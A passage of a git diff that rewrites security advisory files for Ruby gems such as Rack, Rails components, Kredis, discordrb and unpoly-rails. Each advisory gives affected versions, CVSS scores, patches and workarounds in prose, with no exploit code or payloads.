+    Sanitize's default configs don't allow `noscript` elements and are not vulnerable. This issue only affects users who are using a custom config that adds `noscript` to the element allowlist.
+
+    ### Patches
+
+    Sanitize `>= 6.0.1` always removes `noscript` elements and their contents, even when `noscript` is in the allowlist.
+
+    ### Workarounds
+
+    Users who are unable to upgrade can prevent this issue by using one of Sanitize's default configs or by ensuring that their custom config does not include `noscript` in the element allowlist.
+
+    ### Details
+
+    The root cause of this issue is that HTML parsing rules treat the contents of a `noscript` element differently depending on whether scripting is enabled in the user agent. Nokogiri (the HTML parser Sanitize uses) doesn't support scripting so it follows the "scripting disabled" rules, but a web browser with scripting enabled will follow the "scripting enabled" rules. This means that Sanitize can't reliably make the contents of a `noscript` element safe for scripting enabled browsers. The safest thing to do is to remove the element and its contents entirely, which is now what Sanitize does in version 6.0.1 and later.
+  cvss_v3: 6.1
+  unaffected_versions:
+  - "< 5.0.0"
+  patched_versions:
+  - ">= 6.0.1"
+  related:
+    url:
+    - https://github.com/rgrove/sanitize/commit/ec14265e530dc3fe31ce2ef773594d3a97778d22
+    - https://github.com/rgrove/sanitize/releases/tag/v6.0.1
+---
diff --git a/advisories/_posts/2023-01-29-CVE-2023-0569.md b/advisories/_posts/2023-01-29-CVE-2023-0569.md
index 581b0161..10348071 100644
--- a/advisories/_posts/2023-01-29-CVE-2023-0569.md
+++ b/advisories/_posts/2023-01-29-CVE-2023-0569.md
@@ -1,23 +1,23 @@
----
-layout: advisory
-title: 'CVE-2023-0569 (publify_core): Publify contains Weak Password Requirements'
-comments: false
-categories:
-- publify_core
-advisory:
-  gem: publify_core
-  cve: 2023-0569
-  ghsa: g7gf-2rqw-5rwx
-  url: https://github.com/publify/publify/commit/8905e4e639cf03b758da558568a86c9816253b2d
-  title: Publify contains Weak Password Requirements
-  date: 2023-01-29
-  description: |
-    Weak Password Requirements in GitHub repository publify/publify prior
-    to 9.2.10.
-  cvss_v3: 6.5
-  patched_versions:
-  - ">= 9.2.10"
-  related:
-    url:
-    - https://huntr.dev/bounties/81b1e1da-10dd-435e-94ae-4bdd41df6df9
----
+---
+layout: advisory
+title: 'CVE-2023-0569 (publify_core): Publify contains Weak Password Requirements'
+comments: false
+categories:
+- publify_core
+advisory:
+  gem: publify_core
+  cve: 2023-0569
+  ghsa: g7gf-2rqw-5rwx
+  url: https://github.com/publify/publify/commit/8905e4e639cf03b758da558568a86c9816253b2d
+  title: Publify contains Weak Password Requirements
+  date: 2023-01-29
+  description: |
+    Weak Password Requirements in GitHub repository publify/publify prior
+    to 9.2.10.
+  cvss_v3: 6.5
+  patched_versions:
+  - ">= 9.2.10"
+  related:
+    url:
+    - https://huntr.dev/bounties/81b1e1da-10dd-435e-94ae-4bdd41df6df9
+---
diff --git a/advisories/_posts/2023-02-01-CVE-2023-25015.md b/advisories/_posts/2023-02-01-CVE-2023-25015.md
index f9cb91db..618c43ff 100644
--- a/advisories/_posts/2023-02-01-CVE-2023-25015.md
+++ b/advisories/_posts/2023-02-01-CVE-2023-25015.md
@@ -1,23 +1,23 @@
----
-layout: advisory
-title: 'CVE-2023-25015 (clockwork_web): CSRF Vulnerability with Rails < 5.2'
-comments: false
-categories:
-- clockwork_web
-advisory:
-  gem: clockwork_web
-  cve: 2023-25015
-  ghsa: p4xx-w6fr-c4w9
-  url: https://github.com/ankane/clockwork_web/issues/4
-  title: CSRF Vulnerability with Rails < 5.2
-  date: 2023-02-01
-  description: |
-    Clockwork Web is vulnerable to cross-site request forgery (CSRF) with Rails < 5.2.
-
-    A CSRF attack works by getting an authorized user to visit a malicious website and
-    then performing requests on behalf of the user. In this instance, actions include
-    enabling and disabling jobs.
-  cvss_v3: 6.5
-  patched_versions:
-  - ">= 0.1.2"
----
+---
+layout: advisory
+title: 'CVE-2023-25015 (clockwork_web): CSRF Vulnerability with Rails < 5.2'
+comments: false
+categories:
+- clockwork_web
+advisory:
+  gem: clockwork_web
+  cve: 2023-25015
+  ghsa: p4xx-w6fr-c4w9
+  url: https://github.com/ankane/clockwork_web/issues/4
+  title: CSRF Vulnerability with Rails < 5.2
+  date: 2023-02-01
+  description: |
+    Clockwork Web is vulnerable to cross-site request forgery (CSRF) with Rails < 5.2.
+
+    A CSRF attack works by getting an authorized user to visit a malicious website and
+    then performing requests on behalf of the user. In this instance, actions include
+    enabling and disabling jobs.
+  cvss_v3: 6.5
+  patched_versions:
+  - ">= 0.1.2"
+---
diff --git a/advisories/_posts/2023-02-24-CVE-2022-36231.md b/advisories/_posts/2023-02-24-CVE-2022-36231.md
index 12833d4b..0699dd2c 100644
--- a/advisories/_posts/2023-02-24-CVE-2022-36231.md
+++ b/advisories/_posts/2023-02-24-CVE-2022-36231.md
@@ -1,24 +1,24 @@
----
-layout: advisory
-title: 'CVE-2022-36231 (pdf_info): Code injection in pdf_info'
-comments: false
-categories:
-- pdf_info
-advisory:
-  gem: pdf_info
-  cve: 2022-36231
-  ghsa: 9fh3-j99m-f4v7
-  url: https://github.com/affix/CVE-2022-36231
-  title: Code injection in pdf_info
-  date: 2023-02-24
-  description: |
-    pdf_info 0.5.3 is vulnerable to Command Execution. An attacker using
-    a specially crafted payload may execute OS commands by using command chaining because
-    during object initalization there is no validation performed and the user provided
-    path is used.
-  cvss_v3: 9.8
-  related:
-    url:
-    - https://github.com/newspaperclub/pdf_info/issues/16
-    - https://github.com/newspaperclub/pdf_info/pull/15
----
+---
+layout: advisory
+title: 'CVE-2022-36231 (pdf_info): Code injection in pdf_info'
+comments: false
+categories:
+- pdf_info
+advisory:
+  gem: pdf_info
+  cve: 2022-36231
+  ghsa: 9fh3-j99m-f4v7
+  url: https://github.com/affix/CVE-2022-36231
+  title: Code injection in pdf_info
+  date: 2023-02-24
+  description: |
+    pdf_info 0.5.3 is vulnerable to Command Execution. An attacker using
+    a specially crafted payload may execute OS commands by using command chaining because
+    during object initalization there is no validation performed and the user provided
+    path is used.
+  cvss_v3: 9.8
+  related:
+    url:
+    - https://github.com/newspaperclub/pdf_info/issues/16
+    - https://github.com/newspaperclub/pdf_info/pull/15
+---
diff --git a/advisories/_posts/2023-03-03-CVE-2023-27530.md b/advisories/_posts/2023-03-03-CVE-2023-27530.md
index d527982e..9ef3c186 100644
--- a/advisories/_posts/2023-03-03-CVE-2023-27530.md
+++ b/advisories/_posts/2023-03-03-CVE-2023-27530.md
@@ -1,32 +1,32 @@
----
-layout: advisory
-title: 'CVE-2023-27530 (rack): Possible DoS Vulnerability in Multipart MIME parsing'
-comments: false
-categories:
-- rack
-advisory:
-  gem: rack
-  cve: 2023-27530
-  ghsa: 3h57-hmj3-gj3p
-  url: https://discuss.rubyonrails.org/t/cve-2023-27530-possible-dos-vulnerability-in-multipart-mime-parsing/82388
-  title: Possible DoS Vulnerability in Multipart MIME parsing
-  date: 2023-03-03
-  description: |
-    There is a possible DoS vulnerability in the Multipart MIME parsing code in Rack. This vulnerability has been assigned the CVE identifier CVE-2023-27530.
-
-    Versions Affected: All. Not affected: None Fixed Versions: 3.0.4.2, 2.2.6.3, 2.1.4.3, 2.0.9.3
-
-    # Impact
-    The Multipart MIME parsing code in Rack limits the number of file parts, but does not limit the total number of parts that can be uploaded. Carefully crafted requests can abuse this and cause multipart parsing to take longer than expected.
-
-    All users running an affected release should either upgrade or use one of the workarounds immediately.
-
-    # Workarounds
-    A proxy can be configured to limit the POST body size which will mitigate this issue.
-  cvss_v3: 7.5
-  patched_versions:
-  - "~> 2.0.9, >= 2.0.9.3"
-  - "~> 2.1.4, >= 2.1.4.3"
-  - "~> 2.2.6, >= 2.2.6.3"
-  - ">= 3.0.4.2"
----
+---
+layout: advisory
+title: 'CVE-2023-27530 (rack): Possible DoS Vulnerability in Multipart MIME parsing'
+comments: false
+categories:
+- rack
+advisory:
+  gem: rack
+  cve: 2023-27530
+  ghsa: 3h57-hmj3-gj3p
+  url: https://discuss.rubyonrails.org/t/cve-2023-27530-possible-dos-vulnerability-in-multipart-mime-parsing/82388
+  title: Possible DoS Vulnerability in Multipart MIME parsing
+  date: 2023-03-03
+  description: |
+    There is a possible DoS vulnerability in the Multipart MIME parsing code in Rack. This vulnerability has been assigned the CVE identifier CVE-2023-27530.
+
+    Versions Affected: All. Not affected: None Fixed Versions: 3.0.4.2, 2.2.6.3, 2.1.4.3, 2.0.9.3
+
+    # Impact
+    The Multipart MIME parsing code in Rack limits the number of file parts, but does not limit the total number of parts that can be uploaded. Carefully crafted requests can abuse this and cause multipart parsing to take longer than expected.
+
+    All users running an affected release should either upgrade or use one of the workarounds immediately.
+
+    # Workarounds
+    A proxy can be configured to limit the POST body size which will mitigate this issue.
+  cvss_v3: 7.5
+  patched_versions:
+  - "~> 2.0.9, >= 2.0.9.3"
+  - "~> 2.1.4, >= 2.1.4.3"
+  - "~> 2.2.6, >= 2.2.6.3"
+  - ">= 3.0.4.2"
+---
diff --git a/advisories/_posts/2023-03-13-CVE-2023-23913.md b/advisories/_posts/2023-03-13-CVE-2023-23913.md
index 428bfd4d..645abaff 100644
--- a/advisories/_posts/2023-03-13-CVE-2023-23913.md
+++ b/advisories/_posts/2023-03-13-CVE-2023-23913.md
@@ -1,86 +1,86 @@
----
-layout: advisory
-title: 'CVE-2023-23913 (actionview): DOM Based Cross-site Scripting in rails-ujs for
-  contenteditable HTML Elements'
-comments: false
-categories:
-- actionview
-- rails
-advisory:
-  gem: actionview
-  framework: rails
-  cve: 2023-23913
-  ghsa: xp5h-f8jf-rc8q
-  url: https://discuss.rubyonrails.org/t/cve-2023-23913-dom-based-cross-site-scripting-in-rails-ujs-for-contenteditable-html-elements/82468
-  title: DOM Based Cross-site Scripting in rails-ujs for contenteditable HTML Elements
-  date: 2023-03-13
-  description: |
-    NOTE: rails-ujs is part of Rails/actionview since 5.1.0.
-
-    There is a potential DOM based cross-site scripting issue in rails-ujs
-    which leverages the Clipboard API to target HTML elements that are
-    assigned the contenteditable attribute. This has the potential to
-    occur when pasting malicious HTML content from the clipboard that
-    includes a data-method, data-remote or data-disable-with attribute.
-
-    This vulnerability has been assigned the CVE identifier CVE-2023-23913.
-
-    Not affected: < 5.1.0
-    Versions Affected: >= 5.1.0
-    Fixed Versions: 6.1.7.3, 7.0.4.3
-
-    Impact
-      If the specified malicious HTML clipboard content is provided to a
-      contenteditable element, this could result in the arbitrary execution
-      of javascript on the origin in question.
-
-    Releases
-      The FIXED releases are available at the normal locations.
-
-    Workarounds
-      We recommend that all users upgrade to one of the FIXED versions.
-      In the meantime, users can attempt to mitigate this vulnerability
-      by removing the contenteditable attribute from elements in pages
-      that rails-ujs will interact with.
-
-    Patches
-      To aid users who aren’t able to upgrade immediately we have provided
-      patches for the two supported release series. They are in git-am
-      format and consist of a single changeset.
-
-    * rails-ujs-data-method-contenteditable-6-1.patch - Patch for 6.1 series
-    * rails-ujs-data-method-contenteditable-7-0.patch - Patch for 7.0 series
-
-    Please note that only the 7.0.Z and 6.1.Z series are
-    supported at present, and 6.0.Z for severe vulnerabilities.
-
-    Users of earlier unsupported releases are advised to upgrade as
-    soon as possible as we cannot guarantee the continued availability
-    of security fixes for unsupported releases.
-
-    Credits
-      We would like to thank ryotak 15 for reporting this!
-
-    * rails-ujs-data-method-contenteditable-6-1.patch (8.5 KB)
-    * rails-ujs-data-method-contenteditable-7-0.patch (8.5 KB)
-    * rails-ujs-data-method-contenteditable-main.patch (8.9 KB)
-  cvss_v3: 7.5
-  unaffected_versions:
-  - "< 5.1.0"
-  patched_versions:
-  - "~> 6.1.7.3"
-  - ">= 7.0.4.3"
-  related:
-    url:
-    - https://discuss.rubyonrails.org/t/cve-2023-23913-dom-based-cross-site-scripting-in-rails-ujs-for-contenteditable-html-elements/82468
-    - https://www.cve.org/CVERecord?id=CVE-2023-23913
-    - https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs&qid=aa67066c383f12dee5aee964667de4d8
-    - https://access.redhat.com/security/cve/cve-2023-23913
-    - https://bugzilla.redhat.com/show_bug.cgi?id=2182160
-    - https://security.snyk.io/vuln/SNYK-RUBY-RAILS-5291540
-    - https://www.suse.com/security/cve/CVE-2023-23913.html
-    - https://security-tracker.debian.org/tracker/CVE-2023-23913
-    - https://www.mend.io/vulnerability-database/CVE-2023-23913
-    - https://github.com/jasnow/gsd-database/blob/main/2023/23xxx/GSD-2023-23913.json
-  notes: CVE has been reserved, but not filled out.
----
+---
+layout: advisory
+title: 'CVE-2023-23913 (actionview): DOM Based Cross-site Scripting in rails-ujs for
+  contenteditable HTML Elements'
+comments: false
+categories:
+- actionview
+- rails
+advisory:
+  gem: actionview
+  framework: rails
+  cve: 2023-23913
+  ghsa: xp5h-f8jf-rc8q
+  url: https://discuss.rubyonrails.org/t/cve-2023-23913-dom-based-cross-site-scripting-in-rails-ujs-for-contenteditable-html-elements/82468
+  title: DOM Based Cross-site Scripting in rails-ujs for contenteditable HTML Elements
+  date: 2023-03-13
+  description: |
+    NOTE: rails-ujs is part of Rails/actionview since 5.1.0.
+
+    There is a potential DOM based cross-site scripting issue in rails-ujs
+    which leverages the Clipboard API to target HTML elements that are
+    assigned the contenteditable attribute. This has the potential to
+    occur when pasting malicious HTML content from the clipboard that
+    includes a data-method, data-remote or data-disable-with attribute.
+
+    This vulnerability has been assigned the CVE identifier CVE-2023-23913.
+
+    Not affected: < 5.1.0
+    Versions Affected: >= 5.1.0
+    Fixed Versions: 6.1.7.3, 7.0.4.3
+
+    Impact
+      If the specified malicious HTML clipboard content is provided to a
+      contenteditable element, this could result in the arbitrary execution
+      of javascript on the origin in question.
+
+    Releases
+      The FIXED releases are available at the normal locations.
+
+    Workarounds
+      We recommend that all users upgrade to one of the FIXED versions.
+      In the meantime, users can attempt to mitigate this vulnerability
+      by removing the contenteditable attribute from elements in pages
+      that rails-ujs will interact with.
+
+    Patches
+      To aid users who aren’t able to upgrade immediately we have provided
+      patches for the two supported release series. They are in git-am
+      format and consist of a single changeset.
+
+    * rails-ujs-data-method-contenteditable-6-1.patch - Patch for 6.1 series
+    * rails-ujs-data-method-contenteditable-7-0.patch - Patch for 7.0 series
+
+    Please note that only the 7.0.Z and 6.1.Z series are
+    supported at present, and 6.0.Z for severe vulnerabilities.
+
+    Users of earlier unsupported releases are advised to upgrade as
+    soon as possible as we cannot guarantee the continued availability
+    of security fixes for unsupported releases.
+
+    Credits
+      We would like to thank ryotak 15 for reporting this!
+
+    * rails-ujs-data-method-contenteditable-6-1.patch (8.5 KB)
+    * rails-ujs-data-method-contenteditable-7-0.patch (8.5 KB)
+    * rails-ujs-data-method-contenteditable-main.patch (8.9 KB)
+  cvss_v3: 7.5
+  unaffected_versions:
+  - "< 5.1.0"
+  patched_versions:
+  - "~> 6.1.7.3"
+  - ">= 7.0.4.3"
+  related:
+    url:
+    - https://discuss.rubyonrails.org/t/cve-2023-23913-dom-based-cross-site-scripting-in-rails-ujs-for-contenteditable-html-elements/82468
+    - https://www.cve.org/CVERecord?id=CVE-2023-23913
+    - https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs&qid=aa67066c383f12dee5aee964667de4d8
+    - https://access.redhat.com/security/cve/cve-2023-23913
+    - https://bugzilla.redhat.com/show_bug.cgi?id=2182160
+    - https://security.snyk.io/vuln/SNYK-RUBY-RAILS-5291540
+    - https://www.suse.com/security/cve/CVE-2023-23913.html
+    - https://security-tracker.debian.org/tracker/CVE-2023-23913
+    - https://www.mend.io/vulnerability-database/CVE-2023-23913
+    - https://github.com/jasnow/gsd-database/blob/main/2023/23xxx/GSD-2023-23913.json
+  notes: CVE has been reserved, but not filled out.
+---
diff --git a/advisories/_posts/2023-03-13-CVE-2023-27531.md b/advisories/_posts/2023-03-13-CVE-2023-27531.md
index 26ad4d72..7c3caaa4 100644
--- a/advisories/_posts/2023-03-13-CVE-2023-27531.md
+++ b/advisories/_posts/2023-03-13-CVE-2023-27531.md
@@ -1,58 +1,58 @@
----
-layout: advisory
-title: 'CVE-2023-27531 (kredis): Possible Deserialization of Untrusted Data Vulnerability
-  in Kredis JSON'
-comments: false
-categories:
-- kredis
-- rails
-advisory:
-  gem: kredis
-  framework: rails
-  cve: 2023-27531
-  notes: CVE has be reserved, but not filled in.
-  ghsa: h2wm-p2vg-6pw4
-  url: https://discuss.rubyonrails.org/t/cve-2023-27531-possible-deserialization-of-untrusted-data-vulnerability-in-kredis-json/82467#post_1
-  title: Possible Deserialization of Untrusted Data Vulnerability in Kredis JSON
-  date: 2023-03-13
-  description: |
-    There is a deserialization of untrusted data vulnerability in
-    the Kredis JSON deserialization code. This vulnerability has
-    been assigned the CVE identifier CVE-2023-27531.
-
-    'Not affected: None.'
-    'Versions Affected: All.'
-    'Fixed Versions: 1.3.0.1'
-
-    Impact
-      Carefully crafted JSON data processed by Kredis may result in
-      deserialization of untrusted data, potentially leading to
-      deserialization of unexpected objects in the system.
-
-      Any applications using Kredis with JSON are affected.
-
-    Releases
-      The fixed releases are available at the normal locations.
-
-    Workarounds
-      There are no feasible workarounds for this issue.
-
-    Patches
-      To aid users who aren’t able to upgrade immediately we have
-      provided patches for the two supported release series. They
-      are in git-am format and consist of a single changeset.
-
-      * 1-3-0-1-kredis.patch - Patch for 1.3.0 series
-  cvss_v3: 5.3
-  patched_versions:
-  - ">= 1.3.0.1"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2023-27531
-    - https://discuss.rubyonrails.org/t/cve-2023-27531-possible-deserialization-of-untrusted-data-vulnerability-in-kredis-json/82467#post_1
-    - https://github.com/rails/kredis/releases/tag/v1.3.0.1
-    - https://my.diffend.io/gems/kredis/1.3.0/1.3.0.1
-    - https://cve.report/CVE-2023-27531
-    - https://github.com/jasnow/gsd-database/blob/main/2023/27xxx/GSD-2023-27531.json
-    - https://github.com/advisories/GHSA-h2wm-p2vg-6pw4
----
+---
+layout: advisory
+title: 'CVE-2023-27531 (kredis): Possible Deserialization of Untrusted Data Vulnerability
+  in Kredis JSON'
+comments: false
+categories:
+- kredis
+- rails
+advisory:
+  gem: kredis
+  framework: rails
+  cve: 2023-27531
+  notes: CVE has be reserved, but not filled in.
+  ghsa: h2wm-p2vg-6pw4
+  url: https://discuss.rubyonrails.org/t/cve-2023-27531-possible-deserialization-of-untrusted-data-vulnerability-in-kredis-json/82467#post_1
+  title: Possible Deserialization of Untrusted Data Vulnerability in Kredis JSON
+  date: 2023-03-13
+  description: |
+    There is a deserialization of untrusted data vulnerability in
+    the Kredis JSON deserialization code. This vulnerability has
+    been assigned the CVE identifier CVE-2023-27531.
+
+    'Not affected: None.'
+    'Versions Affected: All.'
+    'Fixed Versions: 1.3.0.1'
+
+    Impact
+      Carefully crafted JSON data processed by Kredis may result in
+      deserialization of untrusted data, potentially leading to
+      deserialization of unexpected objects in the system.
+
+      Any applications using Kredis with JSON are affected.
+
+    Releases
+      The fixed releases are available at the normal locations.
+
+    Workarounds
+      There are no feasible workarounds for this issue.
+
+    Patches
+      To aid users who aren’t able to upgrade immediately we have
+      provided patches for the two supported release series. They
+      are in git-am format and consist of a single changeset.
+
+      * 1-3-0-1-kredis.patch - Patch for 1.3.0 series
+  cvss_v3: 5.3
+  patched_versions:
+  - ">= 1.3.0.1"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-27531
+    - https://discuss.rubyonrails.org/t/cve-2023-27531-possible-deserialization-of-untrusted-data-vulnerability-in-kredis-json/82467#post_1
+    - https://github.com/rails/kredis/releases/tag/v1.3.0.1
+    - https://my.diffend.io/gems/kredis/1.3.0/1.3.0.1
+    - https://cve.report/CVE-2023-27531
+    - https://github.com/jasnow/gsd-database/blob/main/2023/27xxx/GSD-2023-27531.json
+    - https://github.com/advisories/GHSA-h2wm-p2vg-6pw4
+---
diff --git a/advisories/_posts/2023-03-13-CVE-2023-27539.md b/advisories/_posts/2023-03-13-CVE-2023-27539.md
index 45b17e34..b7d097c3 100644
--- a/advisories/_posts/2023-03-13-CVE-2023-27539.md
+++ b/advisories/_posts/2023-03-13-CVE-2023-27539.md
@@ -1,28 +1,28 @@
----
-layout: advisory
-title: 'CVE-2023-27539 (rack): Possible Denial of Service Vulnerability in Rack’s
-  header parsing'
-comments: false
-categories:
-- rack
-advisory:
-  gem: rack
-  cve: 2023-27539
-  ghsa: c6qg-cjj8-47qp
-  url: https://discuss.rubyonrails.org/t/cve-2023-27539-possible-denial-of-service-vulnerability-in-racks-header-parsing/82466
-  title: Possible Denial of Service Vulnerability in Rack’s header parsing
-  date: 2023-03-13
-  description: |
-    There is a denial of service vulnerability in the header parsing component of Rack. This vulnerability has been assigned the CVE identifier CVE-2023-27539.
-
-    Versions Affected: >= 2.0.0 Not affected: None. Fixed Versions: 2.2.6.4, 3.0.6.1
-
-    # Impact
-    Carefully crafted input can cause header parsing in Rack to take an unexpected amount of time, possibly resulting in a denial of service attack vector. Any applications that parse headers using Rack (virtually all Rails applications) are impacted.
-
-    # Workarounds
-    Setting Regexp.timeout in Ruby 3.2 is a possible workaround.
-  patched_versions:
-  - "~> 2.0, >= 2.2.6.4"
-  - ">= 3.0.6.1"
----
+---
+layout: advisory
+title: 'CVE-2023-27539 (rack): Possible Denial of Service Vulnerability in Rack’s
+  header parsing'
+comments: false
+categories:
+- rack
+advisory:
+  gem: rack
+  cve: 2023-27539
+  ghsa: c6qg-cjj8-47qp
+  url: https://discuss.rubyonrails.org/t/cve-2023-27539-possible-denial-of-service-vulnerability-in-racks-header-parsing/82466
+  title: Possible Denial of Service Vulnerability in Rack’s header parsing
+  date: 2023-03-13
+  description: |
+    There is a denial of service vulnerability in the header parsing component of Rack. This vulnerability has been assigned the CVE identifier CVE-2023-27539.
+
+    Versions Affected: >= 2.0.0 Not affected: None. Fixed Versions: 2.2.6.4, 3.0.6.1
+
+    # Impact
+    Carefully crafted input can cause header parsing in Rack to take an unexpected amount of time, possibly resulting in a denial of service attack vector. Any applications that parse headers using Rack (virtually all Rails applications) are impacted.
+
+    # Workarounds
+    Setting Regexp.timeout in Ruby 3.2 is a possible workaround.
+  patched_versions:
+  - "~> 2.0, >= 2.2.6.4"
+  - ">= 3.0.6.1"
+---
diff --git a/advisories/_posts/2023-03-13-CVE-2023-28120.md b/advisories/_posts/2023-03-13-CVE-2023-28120.md
index 24fad6e3..59737624 100644
--- a/advisories/_posts/2023-03-13-CVE-2023-28120.md
+++ b/advisories/_posts/2023-03-13-CVE-2023-28120.md
@@ -1,39 +1,39 @@
----
-layout: advisory
-title: 'CVE-2023-28120 (activesupport): Possible XSS Security Vulnerability in SafeBuffer#bytesplice'
-comments: false
-categories:
-- activesupport
-- rails
-advisory:
-  gem: activesupport
-  framework: rails
-  cve: 2023-28120
-  ghsa: pj73-v5mw-pm9j
-  url: https://discuss.rubyonrails.org/t/cve-2023-28120-possible-xss-security-vulnerability-in-safebuffer-bytesplice/82469
-  title: Possible XSS Security Vulnerability in SafeBuffer#bytesplice
-  date: 2023-03-13
-  description: |
-    There is a vulnerability in ActiveSupport if the new bytesplice method is called on a SafeBuffer with untrusted user input.
-    This vulnerability has been assigned the CVE identifier CVE-2023-28120.
-
-    Versions Affected: All. Not affected: None Fixed Versions: 7.0.4.3, 6.1.7.3
-
-    # Impact
-
-    ActiveSupport uses the SafeBuffer string subclass to tag strings as html_safe after they have been sanitized.
-    When these strings are mutated, the tag is should be removed to mark them as no longer being html_safe.
-
-    Ruby 3.2 introduced a new bytesplice method which ActiveSupport did not yet understand to be a mutation.
-    Users on older versions of Ruby are likely unaffected.
-
-    All users running an affected release and using bytesplice should either upgrade or use one of the workarounds immediately.
-
-    # Workarounds
-
-    Avoid calling bytesplice on a SafeBuffer (html_safe) string with untrusted user input.
-  cvss_v3: 5.3
-  patched_versions:
-  - "~> 6.1.7, >= 6.1.7.3"
-  - ">= 7.0.4.3"
----
+---
+layout: advisory
+title: 'CVE-2023-28120 (activesupport): Possible XSS Security Vulnerability in SafeBuffer#bytesplice'
+comments: false
+categories:
+- activesupport
+- rails
+advisory:
+  gem: activesupport
+  framework: rails
+  cve: 2023-28120
+  ghsa: pj73-v5mw-pm9j
+  url: https://discuss.rubyonrails.org/t/cve-2023-28120-possible-xss-security-vulnerability-in-safebuffer-bytesplice/82469
+  title: Possible XSS Security Vulnerability in SafeBuffer#bytesplice
+  date: 2023-03-13
+  description: |
+    There is a vulnerability in ActiveSupport if the new bytesplice method is called on a SafeBuffer with untrusted user input.
+    This vulnerability has been assigned the CVE identifier CVE-2023-28120.
+
+    Versions Affected: All. Not affected: None Fixed Versions: 7.0.4.3, 6.1.7.3
+
+    # Impact
+
+    ActiveSupport uses the SafeBuffer string subclass to tag strings as html_safe after they have been sanitized.
+    When these strings are mutated, the tag is should be removed to mark them as no longer being html_safe.
+
+    Ruby 3.2 introduced a new bytesplice method which ActiveSupport did not yet understand to be a mutation.
+    Users on older versions of Ruby are likely unaffected.
+
+    All users running an affected release and using bytesplice should either upgrade or use one of the workarounds immediately.
+
+    # Workarounds
+
+    Avoid calling bytesplice on a SafeBuffer (html_safe) string with untrusted user input.
+  cvss_v3: 5.3
+  patched_versions:
+  - "~> 6.1.7, >= 6.1.7.3"
+  - ">= 7.0.4.3"
+---
diff --git a/advisories/_posts/2023-03-27-CVE-2023-28102.md b/advisories/_posts/2023-03-27-CVE-2023-28102.md
index 4df0b0b4..fd614b61 100644
--- a/advisories/_posts/2023-03-27-CVE-2023-28102.md
+++ b/advisories/_posts/2023-03-27-CVE-2023-28102.md
@@ -1,27 +1,27 @@
----
-layout: advisory
-title: 'CVE-2023-28102 (discordrb): GHSL-2022-094: Remote Code Execution in discordrb'
-comments: false
-categories:
-- discordrb
-advisory:
-  gem: discordrb
-  cve: 2023-28102
-  ghsa: 8832-4mm5-x2r6
-  url: https://securitylab.github.com/advisories/GHSL-2022-094_discordrb
-  title: 'GHSL-2022-094: Remote Code Execution in discordrb'
-  date: 2023-03-27
-  description: |
-    The encode_file method may lead to remote code execution
-     (RCE) if invoked with untrusted user-controlled data.
-  cvss_v3: 9.6
-  patched_versions:
-  - ">= 3.4.3"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2023-28102
-    - https://securitylab.github.com/advisories/GHSL-2022-094_discordrb
-    - https://github.com/shardlab/discordrb/commit/91e13043ffa89227c3fcdc3408f06da237d28c95
-    - https://rubygems.org/gems/discordrb
-    - https://github.com/advisories/GHSA-8832-4mm5-x2r6
----
+---
+layout: advisory
+title: 'CVE-2023-28102 (discordrb): GHSL-2022-094: Remote Code Execution in discordrb'
+comments: false
+categories:
+- discordrb
+advisory:
+  gem: discordrb
+  cve: 2023-28102
+  ghsa: 8832-4mm5-x2r6
+  url: https://securitylab.github.com/advisories/GHSL-2022-094_discordrb
+  title: 'GHSL-2022-094: Remote Code Execution in discordrb'
+  date: 2023-03-27
+  description: |
+    The encode_file method may lead to remote code execution
+     (RCE) if invoked with untrusted user-controlled data.
+  cvss_v3: 9.6
+  patched_versions:
+  - ">= 3.4.3"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-28102
+    - https://securitylab.github.com/advisories/GHSL-2022-094_discordrb
+    - https://github.com/shardlab/discordrb/commit/91e13043ffa89227c3fcdc3408f06da237d28c95
+    - https://rubygems.org/gems/discordrb
+    - https://github.com/advisories/GHSA-8832-4mm5-x2r6
+---
diff --git a/advisories/_posts/2023-03-30-CVE-2023-28846.md b/advisories/_posts/2023-03-30-CVE-2023-28846.md
index 3492e23f..92908428 100644
--- a/advisories/_posts/2023-03-30-CVE-2023-28846.md
+++ b/advisories/_posts/2023-03-30-CVE-2023-28846.md
@@ -1,74 +1,74 @@
----
-layout: advisory
-title: 'CVE-2023-28846 (unpoly-rails): unpoly-rails Denial of Service vulnerability'
-comments: false
-categories:
-- unpoly-rails
-advisory:
-  gem: unpoly-rails
-  cve: 2023-28846
-  ghsa: m875-3xf6-mf78
-  url: https://github.com/unpoly/unpoly-rails/security/advisories/GHSA-m875-3xf6-mf78
-  title: unpoly-rails Denial of Service vulnerability
-  date: 2023-03-30
-  description: |
-    There is a possible Denial of Service (DoS) vulnerability in the unpoly-rails
-    gem that implements the [Unpoly server protocol](https://unpoly.com/up.protocol)
-    for Rails applications.
-
-    ### Impact
-
-    This issues affects Rails applications
-    that operate as an upstream of a load balancer's that uses [passive health
-    checks](https://docs.nginx.com/nginx/admin-guide/load-balancer/http-health-check/#passive-health-checks).
-
-    The [unpoly-rails](https://github.com/unpoly/unpoly-rails/) gem echoes the request URL
-    as an `X-Up-Location` response header. By making a request with exceedingly long
-    URLs (paths or query string), an attacker can cause unpoly-rails to write a exceedingly
-    large response header.
-
-    If the response header is too large to be parsed by a load balancer downstream
-    of the Rails application, it may cause the load balancer to remove the upstream
-    from a load balancing group. This causes that application instance to become
-    unavailable until a configured timeout is reached or until an active healthcheck
-    succeeds.
-
-    ### Workarounds
-
-    If you cannot upgrade to a fixed release, several workarounds are available:
-
-    - Configure your load balancer to
-      use active health checks, e.g. by periodically requesting a route with a known response
-      that indicates healthiness.
-    - Configure your load balancer so the [maximum size
-      of response headers](https://makandracards.com/operations/537537-nginx-proxy-buffer-tuning)
-      is at least twice the [maximum size of a URL](https://tryhexadecimal.com/guides/http/414-request-uri-too-long).
-    - Instead of changing your server configuration you may also configure your Rails
-      application to delete redundant `X-Up-Location` headers set by unpoly-rails:
-
-      ```ruby
-      class ApplicationController < ActionController::Base
-
-        after_action :remove_redundant_up_location_header
-
-        private
-
-        def remove_redundant_up_location_header
-          if request.original_url == response.headers['X-Up-Location']
-            response.headers.delete('X-Up-Location')
-          end
-        end
-
-      end
-    ```
-  cvss_v3: 5.9
-  patched_versions:
-  - ">= 2.7.2.2"
-  related:
-    url:
-    - https://github.com/unpoly/unpoly-rails/commit/cd9ad0007daceeb3b2354fdcab4f88350427bf16
